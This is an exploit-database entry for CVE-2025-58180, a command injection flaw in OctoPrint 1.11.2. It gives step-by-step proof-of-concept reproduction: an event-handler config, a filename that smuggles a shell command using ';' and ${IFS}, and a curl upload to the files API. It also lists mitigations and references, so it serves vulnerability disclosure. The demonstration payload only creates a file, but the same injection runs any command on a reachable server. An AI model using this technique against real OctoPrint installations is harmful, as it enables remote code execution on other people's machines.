OctoPrint 1.11.2 - File Upload

# Exploit Title: OctoPrint 1.11.2 - File Upload 
# Date: 2025-09-28
# Exploit Author: prabhatverma.addada
# Vendor Homepage: https://octoprint.org
# Software Link: https://github.com/OctoPrint/OctoPrint
# Affected Version(s): <= 1.11.2
# Patched Version(s): 1.11.3
# CVE: CVE-2025-58180
# CVSS (per advisory): 7.5
# Platform: Linux / OctoPrint server
# Type: Remote Code Execution (requires authenticated upload / API key or session)
#
# Short description:
# An authenticated attacker with file-upload access can craft a filename containing shell metacharacters (e.g. ';', ${IFS}) which bypasses filename
# sanitization and, when interpolated into a configured system event handler command, results in arbitrary command execution on the host.
#
# Scope & privileges:
# - Trigger privileges: Authenticated file-upload (API key or valid session). NO admin/root required to trigger the attack.
# - Precondition: A system event handler that executes shell commands using filename/path placeholders must be configured by an administrator.
#
# Tested on:
# - OctoPrint 1.11.2 running via `octoprint serve --port 5000` on Ubuntu 22.04
#
# Reproduction / PoC (manual):
#
# 1) Start OctoPrint 1.11.2:
#    octoprint serve --port 5000 --debug
#    Complete initial setup at http://127.0.0.1:5000 and create an admin user.
#
# 2) Configure a system event handler that runs shell commands with filename placeholders:
#    Edit ~/.octoprint/config.yaml and add:
#
#    events:
#      enabled: true
#      subscriptions:
#        - event: FileAdded
#          type: system
#          debug: true
#          command: "{path}"
#
#    Restart OctoPrint.
#
# 3) Create a harmless test gcode:
#    mkdir -p /tmp/gcode
#    cat > /tmp/gcode/ok.gcode <<'EOF'
#    ; minimal gcode
#    G28
#    M105
#    EOF
#
# 4) Obtain API key from Settings -> API and export it:
#    export API_KEY='<your_api_key_here>'
#
# 5) Ensure target proof file does not exist:
#    ls -la /tmp/test123
#
# 6) PoC upload (non-destructive proof):
#    INJECT_NAME='octo;touch${IFS}/tmp/test123;#.gcode'
#
#    curl -sS -X POST -H "X-Api-Key: $API_KEY" \
#      -F "file=@/tmp/gcode/ok.gcode;filename=\"${INJECT_NAME}\"" \
#      "http://127.0.0.1:5000/api/files/local"
#
# 7) Verify execution:
#    ls -la /tmp/test123
#    If /tmp/test123 exists, the injected command executed and RCE is demonstrated.
#
# Explanation:
# - OctoPrint accepted the uploaded filename (sanitize_name allowed these characters in default config).
# - FileAdded event payload contains the filename/path.
# - A system event subscriber executed a shell command with that placeholder via subprocess with shell=True and without placeholder escaping.
# - Shell metacharacters in the filename are interpreted by the shell and executed.
#
# Mitigations / Workarounds:
# - Upgrade OctoPrint to 1.11.3 (patched).
# - Disable event handlers using filename placeholders (set enabled: false or uncheck in GUI Event Manager).
# - Set feature.enforceReallyUniversalFilenames: true in config.yaml and vet existing uploads.
# - Do not expose OctoPrint to hostile networks; restrict upload access.
#
# References:
# - GitHub Security Advisory: https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-49mj-x8jp-qvfc
# - PoC repo: https://github.com/prabhatverma47/CVE-2025-58180
#
# Notes for triage:
# - Exploit requires only authenticated upload privileges to trigger. No admin/root required to perform the attack.
# - PoC uses non-destructive `touch /tmp/test123`.